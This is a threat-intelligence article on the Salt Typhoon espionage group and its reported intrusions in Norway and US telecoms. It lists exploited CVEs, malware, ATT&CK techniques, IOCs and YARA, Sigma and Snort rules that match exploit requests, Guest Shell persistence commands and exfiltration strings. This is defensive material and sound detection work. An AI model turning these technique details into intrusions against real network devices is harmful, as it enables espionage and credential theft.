Salt Typhoon Expands to Norway: China's Telecom Hackers Are Now a Global Threat
A Nation-State APT That Breached 9 US Carriers Is Operating in Allied Nations. Here's What Your Organization Needs to Know—and Do—Right Now.
Executive Summary: This Is Not Just Norway's Problem
On February 6, 2026, Norway's Police Security Service (PST) publicly confirmed what security professionals have feared: Salt Typhoon—the Chinese state-sponsored APT group that executed the worst telecom breach in US history—has expanded operations to target allied nations.
Norway's intelligence chief called it the country's "most serious security situation since World War II." But this isn't just a Nordic concern. It's a global alert.
Here's what you need to understand:
- Salt Typhoon has breached 200+ organizations across 80 countries, including 9 confirmed US telecommunications carriers
- They accessed CALEA wiretapping systems, giving Chinese intelligence visibility into who US law enforcement was surveilling
- The same vulnerabilities exploited in US attacks (Cisco IOS XE, Ivanti VPN, Palo Alto firewalls) enabled the Norwegian intrusions
- The FBI has placed a $10 million bounty on Salt Typhoon members—one of the highest ever offered for cybercriminals
- 25+ allied intelligence agencies have co-signed advisories on this threat
If your organization operates in telecommunications, energy, defense, maritime, or government services—or if you use Cisco, Ivanti, Fortinet, or Palo Alto edge devices—you are in the target zone.
This article provides everything security leaders need: threat actor profile, technical analysis, IOCs, YARA rules, Sigma rules, MITRE ATT&CK mappings, and role-specific recommendations. The threat is active. The time to act is now.
Salt Typhoon: Profile of a Nation-State Threat Actor
Origins and Attribution
Salt Typhoon is an advanced persistent threat (APT) group operated by China's Ministry of State Security (MSS). First publicly identified in 2021, the group has rapidly evolved into one of the most capable and prolific nation-state cyber espionage operations in the world.
The attribution to China's MSS is unusually certain. In January 2025, the US Treasury Department sanctioned Sichuan Juxinhe Network Technology Co., Ltd. for "direct involvement with Salt Typhoon." This was followed by DOJ indictments and an FBI "Most Wanted" designation for key operators.
Known Aliases:
| Organization | Tracking Name |
|---|---|
| Microsoft | Salt Typhoon |
| Trend Micro | Earth Estries |
| Kaspersky Lab | GhostEmperor |
| ESET | FamousSparrow |
| Mandiant | UNC2286 |
| CrowdStrike | OPERATOR PANDA |
| Recorded Future | RedMike |
Organizational Structure
Salt Typhoon operates with the resources and sophistication of a nation-state:
- Multiple operational teams targeting different regions and industries
- Separate C&C infrastructure teams managing different backdoors and implants
- Shared tools from Malware-as-a-Service providers (notably SNAPPYBEE/Deed RAT)
- Corporate front companies providing infrastructure and technical support
Sanctioned Chinese Contractors:
| Company | Role |
|---|---|
| Sichuan Juxinhe Network Technology (四川聚信和网络科技有限公司) | Infrastructure support, front company |
| Beijing Huanyu Tianqiong Information Technology (北京寰宇天穹信息技术有限公司) | Cyber products and services |
| Sichuan Zhixin Ruijie Network Technology (四川智信锐捷网络科技有限公司) | Network monitoring tools |
Indicted Operators
The DOJ has indicted and the FBI is actively seeking:
Yin Kecheng
- Role: Infrastructure operator, intrusion specialist
- Status: Indicted, Sanctioned, FBI Wanted
- Reward: $2,000,000
- Affiliation: Sichuan Juxinhe Network Technology
Zhou Shuai (alias "Coldface")
- Role: Strategic broker, data resale
- Status: Indicted, Sanctioned, FBI Wanted
- Reward: $2,000,000
- Affiliation: Shanghai Heiying Information Technology, i-SOON
Primary Motivation: Espionage and Pre-Positioning
Salt Typhoon's objectives are strategic, not financial:
- Intelligence Collection: Harvesting communications metadata, call records, and audio from high-value targets
- Counterintelligence: Understanding who US law enforcement is surveilling via CALEA system access
- Pre-positioning: Establishing persistent access for potential future disruption operations
- Technology Acquisition: Stealing proprietary technology and trade secrets
Former NSA analyst Terry Dunlap described Salt Typhoon as "a component of China's 100-year strategy"—a patient, systematic approach to intelligence gathering that prioritizes long-term access over quick wins.
The Norway Intrusion: What We Know
PST Disclosure: February 6, 2026
Norway's Police Security Service (Politiets sikkerhetstjeneste, PST) publicly attributed cyber intrusions to Salt Typhoon in their annual National Threat Assessment 2026. This marks the first public attribution of Salt Typhoon activity by a Nordic nation.
Key Statements from PST Director General Beate Gangås:
"Norway is facing its most serious security situation since World War II."
"Chinese intelligence services have strengthened their ability to operate in Norway, including through cyber operations and human intelligence collection."
"Salt Typhoon exploited vulnerable network devices in Norway to conduct espionage operations."
"China is systematically exploiting collaborative R&D projects."
What Was Targeted
While PST did not name specific victim organizations, the threat assessment and Norway's strategic profile indicate likely targets:
High-Value Norwegian Sectors:
| Sector | Strategic Value to China |
|---|---|
| Energy (Oil/Gas) | Norway is Europe's 2nd largest gas exporter; critical post-Russia energy source |
| Maritime/Shipping | Major global shipping industry; controls North Sea/Arctic routes |
| Telecommunications | Infrastructure for government/military communications |
| Defense Contractors | NATO's northern flank; US military presence; allied capabilities |
| Arctic Operations | Svalbard sovereignty; Polar Silk Road ambitions; resource access |
| Research Institutions | Technology transfer opportunities; academic partnerships |
Access Vector Confirmed: Network Devices
PST specifically stated that Salt Typhoon "exploited vulnerable network devices"—consistent with the group's established modus operandi:
- Cisco routers and switches (IOS XE vulnerabilities)
- VPN concentrators (Ivanti, Fortinet)
- Next-generation firewalls (Palo Alto PAN-OS)
- Edge security appliances (Sophos, Citrix)
This is not endpoint compromise. This is infrastructure-level intrusion—far more difficult to detect and far more devastating in impact.
Geopolitical Context
Norway's targeting follows a strategic pattern:
- Energy Leverage: Understanding European energy supply chains gives China economic intelligence and potential disruption capabilities
- Arctic Access: China's Polar Silk Road ambitions require intelligence on Arctic governance and resources
- NATO Intelligence: Norway hosts NATO exercises and US military installations; communications intelligence is invaluable
- Technology Acquisition: Norwegian subsea engineering and maritime technology are world-leading
- Allied Signal Intelligence: Compromising Norwegian networks provides insight into broader NATO operations
The timing is also significant: with European attention focused on Russia, Chinese intelligence operations can proceed with reduced scrutiny.
Global Campaign Scope: 200+ Organizations, 80 Countries
The Full Picture
Norway is not an isolated incident. Salt Typhoon has executed one of the most extensive cyber espionage campaigns ever documented:
Campaign Statistics:
| Metric | Value | Source |
|---|---|---|
| Countries affected | 80+ | FBI (Aug 2025) |
| Organizations breached | 200+ | FBI (Aug 2025) |
| US telecoms confirmed | 9 | White House (Dec 2024) |
| Users with metadata stolen | 1,000,000+ | NYT/WSJ (Dec 2024) |
| Allied agencies warning | 25+ | CISA AA25-239A |
| FBI bounty offered | $10,000,000 | FBI (Apr 2025) |
US Telecommunications: Ground Zero
The US telecom breaches represent the heart of Salt Typhoon's campaign. Senator Maria Cantwell called it "the worst telecom hack in our nation's history."
Confirmed US Victims:
- AT&T
- Verizon
- T-Mobile
- Lumen Technologies
- Windstream
- Spectrum (Charter Communications)
- Consolidated Communications
- Viasat
- (One carrier still unnamed)
What They Stole
Call Detail Records (CDRs):
- Date, time, and duration of calls
- Source and destination phone numbers
- Cell tower and location data
- Over 1 million users affected, concentrated in Washington D.C. metro area
VoIP and Network Configurations:
- Complete network architecture diagrams
- VPN configurations and credentials
- Authentication system details
CALEA Wiretap Systems:
This is the most damaging aspect. CALEA (Communications Assistance for Law Enforcement Act) systems are used by law enforcement and intelligence agencies for court-authorized surveillance. Access to these systems gave Salt Typhoon:
- Visibility into who US law enforcement was investigating
- Awareness of active surveillance operations
- Intelligence on FBI and DOJ investigative priorities
- Potential to monitor ongoing investigations in real-time
Deputy National Security Advisor Anne Neuberger confirmed a "large number" of directly accessed individuals were "government targets of interest."
High-Profile Targets:
- Staff of the Kamala Harris 2024 presidential campaign
- Donald Trump's personal communications
- JD Vance's personal communications
- Congressional committee email systems (disclosed Dec 2025)
Geographic Expansion Timeline
| Date | Milestone |
|---|---|
| 2019 | Salt Typhoon operations begin |
| 2023 | US telecom infiltration starts |
| Sep 2024 | First public reports of telecom compromise |
| Oct 2024 | CALEA system access confirmed |
| Nov 2024 | T-Mobile attempted intrusion disclosed |
| Dec 2024 | White House confirms 9 telecoms breached |
| Jan 2025 | Treasury sanctions Sichuan Juxinhe |
| Feb 2025 | Canadian telecom breach confirmed |
| Apr 2025 | FBI announces $10M bounty |
| Jun 2025 | Viasat identified as victim |
| Aug 2025 | CISA issues AA25-239A with 25 agency co-seal |
| Nov 2025 | Australian targets confirmed |
| Dec 2025 | Congressional email breach disclosed |
| Feb 2026 | Norwegian intrusions confirmed |
Confirmed Affected Countries
Beyond the United States, Salt Typhoon has confirmed victims in:
- North America: Canada
- Europe: Norway, United Kingdom, Netherlands, Germany, France
- Asia-Pacific: Australia
The 80-country figure suggests operations across every continent where China has strategic interests.
Technical Analysis: Vulnerabilities and TTPs
Vulnerability Exploitation Strategy
Salt Typhoon's approach is distinctive: they exploit known, patchable vulnerabilities in network edge devices—often months or years after patches are available.
This is not the work of operators who need to burn zero-days. It's the work of operators who know that most organizations fail to patch network infrastructure devices with the same urgency they apply to endpoints.
Exploited Vulnerabilities (CVEs)
| CVE | CVSS | Vendor | Product | Description | Patch Available |
|---|---|---|---|---|---|
| CVE-2024-3400 | 10.0 | Palo Alto Networks | PAN-OS GlobalProtect | Arbitrary file creation leading to RCE | Apr 2024 |
| CVE-2023-20198 | 10.0 | Cisco | IOS XE | Web UI authentication bypass | Oct 2023 |
| CVE-2023-48788 | 9.8 | Fortinet | FortiClientEMS | SQL Injection vulnerability | Mar 2024 |
| CVE-2022-3236 | 9.8 | Sophos | Firewall | Code injection vulnerability | Sep 2022 |
| CVE-2021-26855 | 9.8 | Microsoft | Exchange Server | ProxyLogon SSRF | Mar 2021 |
| CVE-2018-0171 | 9.8 | Cisco | IOS / IOS XE | Smart Install RCE | Mar 2018 |
| CVE-2024-21887 | 9.1 | Ivanti | Connect Secure | Command injection (chained) | Jan 2024 |
| CVE-2023-46805 | 8.2 | Ivanti | Connect Secure | Authentication bypass | Jan 2024 |
| CVE-2023-20273 | 7.2 | Cisco | IOS XE | Post-auth command injection | Oct 2023 |
| CVE-2025-5777 | TBD | Citrix | NetScaler Gateway | Unauthenticated memory read | 2025 |
Key Observation: The oldest vulnerability in active use (CVE-2018-0171) was patched eight years ago. The Sophos vulnerability was patched four years ago. Salt Typhoon succeeds because organizations don't patch network infrastructure.
Custom Malware Arsenal
Salt Typhoon deploys sophisticated custom malware designed for telecommunications and network device environments:
GhostSpider
- Multi-modular backdoor specifically designed for telecommunications targeting
- Modular architecture allows operators to load capabilities as needed
- Communicates over encrypted channels
- Resistant to traditional endpoint detection
Demodex
- Windows kernel-mode rootkit
- Provides persistent, stealthy access that survives reboots
- Extremely difficult to detect with standard tools
- Used for long-term persistence on Windows infrastructure
SnappyBee (Deed RAT)
- Modular backdoor shared among multiple Chinese APT groups
- Indicates access to common MSS tooling ecosystem
- Well-documented, suggesting broad operational use
Masol RAT
- Linux backdoor targeting government networks
- Custom-built for persistent access to Unix/Linux infrastructure
- Minimal footprint, difficult to detect
Crowdoor
- Persistence backdoor with process injection capabilities
- Used as initial foothold before deploying more sophisticated tools
Infrastructure Exploitation Techniques
Salt Typhoon's techniques on network devices are particularly sophisticated:
Container-Based Persistence:
- Deploys malicious containers using Cisco Guest Shell on IOS XE/NX-OS devices
- Container activity is rarely monitored by security teams
- Provides Linux environment on network devices for running custom tools
- Commands to watch for:
guestshell enable,guestshell run bash,guestshell disable
Living-off-the-Land:
- Uses native device capabilities for packet capture (SPAN/RSPAN/ERSPAN)
- Leverages built-in SNMP capabilities for reconnaissance
- Exploits legitimate management protocols (SSH, HTTPS) for C2
GRE/IPsec Tunneling:
- Creates encrypted tunnels from compromised devices directly to C2 in China
- Uses mGRE for multi-point connectivity
- Tunnels blend with legitimate VPN traffic
TACACS+ Credential Harvesting:
- Captures authentication packets on network devices
- Obtains credentials for network management systems
- Enables lateral movement to additional infrastructure
ACL Manipulation:
- Modifies Access Control Lists to whitelist attacker IP addresses
- Preserves access even if initial vulnerability is patched
- Difficult to detect without configuration baseline comparisons
SSH Evasion Techniques
Salt Typhoon uses non-standard SSH port patterns to evade detection:
- Ports matching pattern:
22x22(e.g., 22022, 22122) - Ports ending in
22(e.g., 55022) - High-numbered HTTPS ports (18xxx range)
- Cisco IOS XR sshd_operns on TCP/57722
MITRE ATT&CK Mapping
Understanding Salt Typhoon's techniques through the MITRE ATT&CK framework enables defenders to systematically address coverage gaps.
Initial Access
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1190 | Exploit Public-Facing Application | Primary method; exploits VPNs, firewalls, routers via N-day vulnerabilities |
| T1199 | Trusted Relationship | Pivots through provider-to-provider interconnections; abuses carrier peering relationships |
Execution
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1059.008 | Command and Scripting Interpreter | Executes commands via SNMP, SSH, HTTP POST on network devices |
Persistence
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1098.004 | Account Manipulation: SSH Authorized Keys | Injects SSH keys for persistent access |
| T1136.001 | Create Account: Local Account | Creates local admin accounts on network devices |
| T1543.003 | Create/Modify System Process | Creates Windows services for persistence |
| T1543.005 | Container Service | Deploys persistent containers on Cisco IOS XE |
Privilege Escalation
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1068 | Exploitation for Privilege Escalation | Post-authentication command injection (CVE-2023-20273) |
Defense Evasion
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1027 | Obfuscated Files or Information | Multi-layer XOR and Base64 encoding |
| T1027.010 | Command Obfuscation | Encodes commands to avoid detection |
| T1562.004 | Impair Defenses: Disable or Modify System Firewall | Modifies ACLs to whitelist attacker IPs |
| T1070.009 | Indicator Removal: Clear Persistence | Destroys containers after use |
| T1610 | Deploy Container | Uses containerization for evasion and persistence |
Credential Access
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1003 | OS Credential Dumping | Extracts NTDS.dit, captures TACACS+ packets |
| T1110.002 | Brute Force: Password Cracking | Cracks captured authentication hashes |
| T1556 | Modify Authentication Process | Modifies authentication on network devices |
Discovery
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1016 | System Network Configuration Discovery | Maps network topology from device configs |
| T1082 | System Information Discovery | Enumerates device versions, capabilities |
| T1595 | Active Scanning | Scans for additional vulnerable devices |
Lateral Movement
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1021.004 | Remote Services: SSH | SSH on non-standard ports (22x22 pattern) |
| T1199 | Trusted Relationship | Moves through carrier interconnections |
Collection
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1005 | Data from Local System | Collects configs, credentials, databases |
| T1040 | Network Sniffing | Uses native PCAP on routers/switches |
| T1560 | Archive Collected Data | Compresses data before exfiltration |
| T1602.001 | Data from Configuration Repository: SNMP | Retrieves configs via SNMP |
| T1602.002 | Data from Configuration Repository: Network Device Config | Exports running-config files |
Command and Control
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1071 | Application Layer Protocol | HTTP/HTTPS for C2 communications |
| T1090.003 | Proxy: Multi-hop Proxy | Uses STOWAWAY for chained relays |
| T1572 | Protocol Tunneling | GRE, mGRE, IPsec tunnels to China |
Exfiltration
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1041 | Exfiltration Over C2 Channel | Exfils via established tunnels |
| T1048.003 | Exfiltration Over Alternative Protocol | Uses non-standard ports and protocols |
Detection and Defense
Detection Strategy Overview
Salt Typhoon's focus on network infrastructure requires a different detection approach than traditional endpoint-focused security. Most organizations have robust endpoint detection but minimal visibility into router, switch, and firewall activity.
Key Detection Principles:
- Configuration monitoring is essential—you cannot detect what you don't baseline
- Network device logs must be collected and analyzed
- Container and virtualization activity on network devices is rarely monitored—fix this
- Unusual traffic patterns on management interfaces indicate compromise
Indicators of Compromise (IOCs)
High-Confidence IP Addresses:
45.61.134.134
45.61.133.157
45.61.128.29
45.61.132.125
104.194.153.181
104.194.129.137
104.194.147.15
167.88.173.252
172.86.101.123
172.86.106.234
193.239.86.132
85.195.89.94
89.117.1.147
91.231.186.227
103.169.91.231
103.199.17.238
103.253.40.199
1.222.84.29
Malware Hashes (SHA256):
| Filename | SHA256 | Description |
|---|---|---|
| cmd3 | 8b448f47e36909f3a921b4ff803cf3a61985d8a10f0fe594b405b92ed0fc21f1 |
SFTP exfil client |
| cmd1 | f2bbba1ea0f34b262f158ff31e00d39d89bbc471d04e8fca60a034cabe18e4f4 |
SFTP + PCAP collection |
| new2 | da692ea0b7f24e31696f8b4fe8a130dbbe3c7c15cea6bde24cccc1fb0a73ae9e |
SFTP client variant |
| sft | a1abc3d11c16ae83b9a7cf62ebe6d144dfc5e19b579a99bad062a9d31cf30bfe |
SFTP client variant |
Host-Based Indicators:
| Indicator Type | Values to Watch |
|---|---|
| PCAP capture names | mycap, mycap.pcap, tac.pcap, 1.pcap |
| Suspicious ACL names | access-list 10, access-list 20, access-list 50 |
| SSH port patterns | Ports matching 22x22 or ending in 22 |
| HTTPS high ports | Ports in 18xxx range |
| TACACS+ connections | TCP/49 to unapproved servers |
| IOS XR SSH | TCP/57722 (sshd_operns) |
YARA Rules
Salt Typhoon CMD1 SFTP Client Detection:
rule SALT_TYPHOON_CMD1_SFTP_CLIENT {
meta:
description = "Detects the Salt Typhoon Cmd1 SFTP client used for data exfiltration"
author = "CISA"
reference = "AA25-239A"
date = "2025-08-27"
threat_level = "critical"
strings:
$s1 = "monitor capture CAP"
$s2 = "export ftp://%s:%s@%s%s"
$s3 = "main.CapExport"
$s4 = "main.SftpDownload"
$s5 = ".(*SSHClient).CommandShell"
$aes = "aes.decryptBlockGo"
$buildpath = "C:/work/sync_v1/cmd/cmd1/main.go"
condition:
(uint32(0) == 0x464c457f or (uint16(0) == 0x5A4D and
uint32(uint32(0x3C)) == 0x00004550)) and 5 of them
}
GhostSpider Backdoor Detection:
rule SALT_TYPHOON_GHOSTSPIDER {
meta:
description = "Detects GhostSpider modular backdoor"
author = "Trend Micro"
date = "2024-11-25"
strings:
$str1 = "GhostSpider" ascii wide
$str2 = "SNAPPYBEE" ascii wide
$mod1 = "InitializeModule" ascii
$mod2 = "ExecutePayload" ascii
$enc1 = { 48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 74 24 ?? 57 48 83 EC ?? }
condition:
uint16(0) == 0x5A4D and
(2 of ($str*) or all of ($mod*)) and
$enc1
}
Sigma Rules
Suspicious Guest Shell Activity on Cisco Devices:
title: Salt Typhoon Guest Shell Container Activity
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects Guest Shell commands associated with Salt Typhoon container persistence
author: Breached.Company
date: 2026/02/08
references:
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a
logsource:
category: network
product: cisco
service: syslog
detection:
selection_guestshell:
CommandLine|contains:
- 'guestshell enable'
- 'guestshell run bash'
- 'guestshell destroy'
selection_chvrf:
CommandLine|contains:
- 'chvrf'
- 'dohost'
condition: selection_guestshell or selection_chvrf
falsepositives:
- Legitimate Guest Shell usage by network administrators
- Automated provisioning systems
level: high
tags:
- attack.persistence
- attack.t1610
- attack.t1543.005
Non-Standard SSH Port Detection:
title: Salt Typhoon Non-Standard SSH Port Pattern
id: b2c3d4e5-f6a7-8901-bcde-f23456789012
status: experimental
description: Detects SSH connections on ports matching Salt Typhoon patterns
author: Breached.Company
date: 2026/02/08
logsource:
category: firewall
detection:
selection_ssh_pattern:
dst_port|re: '(22.22|..22$|57722|18[0-9]{3})'
action: 'allow'
filter_known_management:
dst_ip|cidr:
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
condition: selection_ssh_pattern and not filter_known_management
falsepositives:
- Custom SSH configurations
- Non-standard management ports
level: medium
tags:
- attack.command_and_control
- attack.t1021.004
Unauthorized TACACS+ Connection:
title: TACACS+ Connection to Unauthorized Server
id: c3d4e5f6-a7b8-9012-cdef-345678901234
status: experimental
description: Detects TACACS+ (TCP/49) connections to non-approved servers
author: Breached.Company
date: 2026/02/08
logsource:
category: firewall
detection:
selection:
dst_port: 49
filter_approved:
dst_ip:
- '<APPROVED_TACACS_SERVER_1>'
- '<APPROVED_TACACS_SERVER_2>'
condition: selection and not filter_approved
falsepositives:
- New TACACS+ servers not yet added to allow list
level: high
tags:
- attack.credential_access
- attack.t1556
GRE Tunnel to Suspicious Destination:
title: GRE Tunnel to External Destination
id: d4e5f6a7-b8c9-0123-def0-456789012345
status: experimental
description: Detects GRE tunnel creation to external IP addresses
author: Breached.Company
date: 2026/02/08
logsource:
category: network
product: cisco
service: syslog
detection:
selection:
Message|contains:
- 'tunnel mode gre'
- 'tunnel mode mgre'
- 'tunnel destination'
filter_internal:
Message|contains:
- '10.'
- '172.16.'
- '192.168.'
condition: selection and not filter_internal
falsepositives:
- Legitimate WAN tunnels
- SD-WAN configurations
level: high
tags:
- attack.command_and_control
- attack.t1572
Snort Rules
CVE-2023-20198 Exploit Detection:
alert tcp any any -> any $HTTP_PORTS (
msg:"SALT TYPHOON - Potential CVE-2023-20198 Cisco IOS XE Exploit";
flow:to_server,established;
content:"POST"; http_method;
pcre:"/(webui_wsma|%2577ebui_wsma|%2577eb%2575i_%2577sma)/i"; http_uri;
content:"<request xmlns=\"urn:cisco:wsma-config\""; http_client_body;
content:"username"; http_client_body;
content:"privilege 15"; http_client_body;
classtype:web-application-attack;
sid:2026020801;
rev:1;
)
Ivanti Connect Secure Exploit Detection:
alert tcp any any -> any $HTTP_PORTS (
msg:"SALT TYPHOON - Potential CVE-2024-21887 Ivanti Exploit Attempt";
flow:to_server,established;
content:"/api/v1/totp/user-backup-code"; http_uri;
content:"POST"; http_method;
content:"|3b|"; http_client_body;
classtype:web-application-attack;
sid:2026020802;
rev:1;
)
Critical Detection Priorities
Priority 1: Configuration Baseline and Monitoring
- Pull all network device configurations immediately
- Hash and store for baseline comparison
- Compare against authorized change requests
- Alert on any unauthorized modifications
- Pay special attention to:
- ACL additions/modifications
- New local accounts
- SSH key changes
- Routing table modifications
- SNMP community string changes
- TACACS+/RADIUS server changes
Priority 2: Guest Shell / Container Monitoring
- Audit Guest Shell status on all Cisco IOS XE and NX-OS devices
- Document authorized container use cases
- Alert on unexpected Guest Shell enable/disable events
- Monitor for
chvrfanddohostcommands - Check for persistent containers that shouldn't exist
Priority 3: Network Traffic Analysis
- Monitor for GRE/IPsec tunnels to unexpected destinations
- Alert on SSH connections to non-standard ports (22x22 pattern)
- Watch for HTTPS on high ports (18xxx range)
- Track TACACS+/RADIUS traffic to unapproved servers
- Monitor for unusual FTP/TFTP transfers from network devices
Priority 4: Firmware/Software Integrity
- Verify firmware hashes against vendor database
- Compare memory images against known-good states
- Use Cisco's Network Device Integrity (NDI) methodology
- Check for unexpected processes or files on network devices
- Validate cryptographic signatures on all updates
Implications for US and Allied Organizations
The Strategic Threat
Salt Typhoon's expansion to Norway is not an isolated incident—it's evidence of systematic targeting of allied nations' critical infrastructure. Organizations in the US, Canada, UK, Australia, and other Five Eyes nations should consider themselves potential targets.
Key Implications:
- The campaign is ongoing and expanding. Norway is the latest public disclosure, but intelligence suggests operations continue across all 80+ affected countries.
- Edge device vulnerabilities are the common thread. Whether it's US telecoms or Norwegian energy companies, Salt Typhoon succeeds by exploiting known vulnerabilities in network infrastructure.
- Detection is extremely difficult. The combination of rootkits, container-based evasion, and living-off-the-land techniques means many organizations may already be compromised without knowing.
- The goal is long-term access, not smash-and-grab. Salt Typhoon establishes persistent access for ongoing intelligence collection and potential future disruption operations.
- Provider relationships are attack vectors. Salt Typhoon has demonstrated ability to pivot through trusted relationships between carriers and service providers.
Sector-Specific Risk Assessment
CRITICAL RISK:
| Sector | Why Salt Typhoon Targets It |
|---|---|
| Telecommunications | Primary target; direct access to communications data |
| Energy / Utilities | Critical infrastructure; disruption potential; economic intelligence |
| Defense / Aerospace | Military intelligence; technology acquisition; allied capabilities |
HIGH RISK:
| Sector | Why Salt Typhoon Targets It |
|---|---|
| Maritime / Shipping | Supply chain visibility; Arctic routes; naval intelligence |
| Technology | Intellectual property; supply chain compromise |
| Government Services | Policy intelligence; diplomatic communications |
| Financial Services | Economic intelligence; sanctions evasion |
ELEVATED RISK:
| Sector | Why Salt Typhoon Targets It |
|---|---|
| Manufacturing | Technology transfer; supply chain access |
| Research / Academia | R&D exploitation; talent identification |
| Healthcare | Research data; biotech IP |
Regulatory Implications
Current:
- FCC is drafting stricter telecom cybersecurity requirements
- Congressional oversight intensifying (Senate Commerce Committee hearings)
- Potential mandatory breach reporting for CALEA system compromises
- SEC cybersecurity disclosure rules apply to material breaches
Expected:
- Mandatory edge device security standards for critical infrastructure
- Enhanced supply chain security requirements
- Increased reporting obligations for nation-state intrusions
- Stricter penalties for inadequate security measures
The $10 Million Question
The FBI's $10 million bounty on Salt Typhoon members—one of the highest ever offered—signals the severity of this threat at the highest levels of government. This isn't just cybercrime. This is state-sponsored espionage that has:
- Compromised the US law enforcement surveillance apparatus
- Accessed communications of senior political figures
- Penetrated critical telecommunications infrastructure across allied nations
- Demonstrated ability to maintain persistent, undetected access for years
Organizations should calibrate their response accordingly.
Actionable Recommendations by Role
For CISOs and Security Executives
Immediate Actions (This Week):
- Confirm your edge device inventory is complete. You cannot protect what you don't know about. Audit all routers, switches, firewalls, VPN concentrators, and other network infrastructure.
- Validate patching status for Salt Typhoon CVEs. Priority focus on CVE-2023-20198, CVE-2024-21887, CVE-2024-3400, CVE-2023-48788.
- Request a configuration baseline report from your network team. If one doesn't exist, create it immediately.
- Brief your board and executive team. This is a material threat that warrants executive awareness. The FBI bounty and Norway disclosure are clear indicators of severity.
- Activate your threat hunting capability. If you don't have one, engage a third party immediately.
Short-Term Actions (30 Days):
- Commission a network infrastructure security assessment. Traditional pentests focus on applications—you need infrastructure-level assessment.
- Review and segment provider/vendor access. Salt Typhoon exploits trusted relationships. Map all third-party network access.
- Evaluate out-of-band management capability. If your management plane is compromised, can you still administer your network?
- Review incident response playbooks. Ensure you have specific procedures for network device compromise, not just endpoint incidents.
- Engage with your ISAC. If you're in telecommunications, energy, maritime, or defense—coordinate with sector peers.
Strategic Actions (90 Days):
- Implement network device integrity monitoring. This is non-negotiable for critical infrastructure.
- Evaluate zero-trust architecture for infrastructure management. Reduce reliance on perimeter security alone.
- Conduct tabletop exercise for APT scenario. Simulate Salt Typhoon-style intrusion. Test detection, response, and recovery.
- Review insurance coverage. Nation-state exclusions may apply. Understand your exposure.
For Security Operations (SOC/IR)
Detection Priorities:
- Deploy IOCs immediately. Add IP addresses and file hashes to SIEM, EDR, and network monitoring tools.
- Implement YARA rules on file inspection systems. Focus on exfiltration tools (cmd1, cmd3, sft, new2).
- Enable Sigma rules in SIEM. Prioritize Guest Shell monitoring, non-standard SSH detection, and unauthorized TACACS+ connections.
- Configure Snort/Suricata rules. Focus on CVE exploit detection for Cisco IOS XE and Ivanti vulnerabilities.
- Create alerts for unusual network device activity:
- Configuration changes outside change windows
- SSH connections on non-standard ports
- GRE/IPsec tunnel creation
- TACACS+ to unexpected servers
- FTP/TFTP from infrastructure devices
Threat Hunting Priorities:
- Audit all network device configurations. Compare against baselines. Look for:
- Unauthorized ACL entries
- Unexpected local accounts
- New SSH authorized keys
- Unusual routing entries
- PCAP configurations you didn't create
- Review Guest Shell status on Cisco devices. Any unexpected containers should trigger investigation.
- Analyze network flows for tunnel patterns. Look for persistent connections to unusual destinations, especially using GRE, mGRE, or IPsec.
- Check firmware integrity. Verify hashes against vendor-provided values.
- Review authentication logs. Look for unusual TACACS+/RADIUS activity, especially successful authentications from unexpected sources.
Incident Response Preparation:
- Preserve network device logs and configurations. Many network devices have limited log retention—ensure centralized collection.
- Document out-of-band access procedures. If you discover compromise, you need alternative management access.
- Prepare device re-imaging procedures. Complete device rebuild may be necessary; ensure you can execute quickly.
- Identify forensic support for network devices. This requires specialized expertise—identify vendors now, not during an incident.
For Network Engineering Teams
Immediate Hardening:
- Patch all devices against Salt Typhoon CVEs. No exceptions. Legacy devices that cannot be patched must be isolated or replaced.
- Disable unused services and protocols:
- Smart Install (CVE-2018-0171)
- Web UI on Cisco IOS XE if not required
- SNMP with community strings (use SNMPv3)
- Telnet (SSH only)
- Implement MFA for all network management access. No exceptions for "emergency" accounts.
- Review and tighten ACLs. Document all entries. Remove anything that can't be justified.
- Disable Guest Shell if not required. If required, document use cases and monitor closely.
Configuration Standards:
- Implement role-based access control. Minimum privilege for all accounts.
- Standardize SSH configurations:
- Use standard port 22 only for authorized management
- Implement key-based authentication
- Disable password authentication where possible
- Use strong key algorithms (ED25519, RSA 4096)
- Configure comprehensive logging:
- Enable configuration change logging
- Enable login/logout logging
- Send logs to centralized SIEM
- Set appropriate log buffer sizes
- Implement TACACS+/RADIUS properly:
- Use encrypted communications
- Implement authorization policies
- Log all authentication attempts
- Regular credential rotation
Monitoring and Verification:
- Implement automated configuration backup and comparison. Tools like RANCID, Oxidized, or vendor solutions.
- Schedule regular firmware integrity checks. Compare hashes against vendor database.
- Monitor for unauthorized containers. Alert on Guest Shell activity.
- Review routing tables for anomalies. Unexpected routes may indicate compromise.
For Threat Intelligence Teams
Collection Priorities:
- Monitor for updated Salt Typhoon IOCs. CISA updates advisories regularly. Subscribe to alert feeds.
- Track alias activity. Earth Estries, GhostEmperor, FamousSparrow research may reveal techniques before Salt Typhoon attribution.
- Watch for Nordic-region disclosures. Sweden, Denmark, Finland may follow Norway with their own announcements.
- Monitor vendor security bulletins. Cisco, Ivanti, Palo Alto, Fortinet—new vulnerabilities will be exploited.
- Engage with sector ISACs. E-ISAC, MS-ISAC, IT-ISAC, Maritime-ISAC may have private indicators.
Analysis Priorities:
- Map your organization against Salt Typhoon targeting patterns. Telecommunications, energy, defense, maritime, and government services are priority targets.
- Assess supply chain exposure. Your telecom provider may be compromised. Your network equipment vendor may be targeted.
- Evaluate geopolitical factors. Organizations with presence in China-interest regions (Arctic, South China Sea, Taiwan) face elevated risk.
- Track regulatory developments. FCC rules, congressional action, and international coordination will shape requirements.
Sharing Priorities:
- Report suspicious activity to CISA. Salt Typhoon is a priority threat—information sharing is critical.
- Coordinate with sector peers. Collective defense requires shared intelligence.
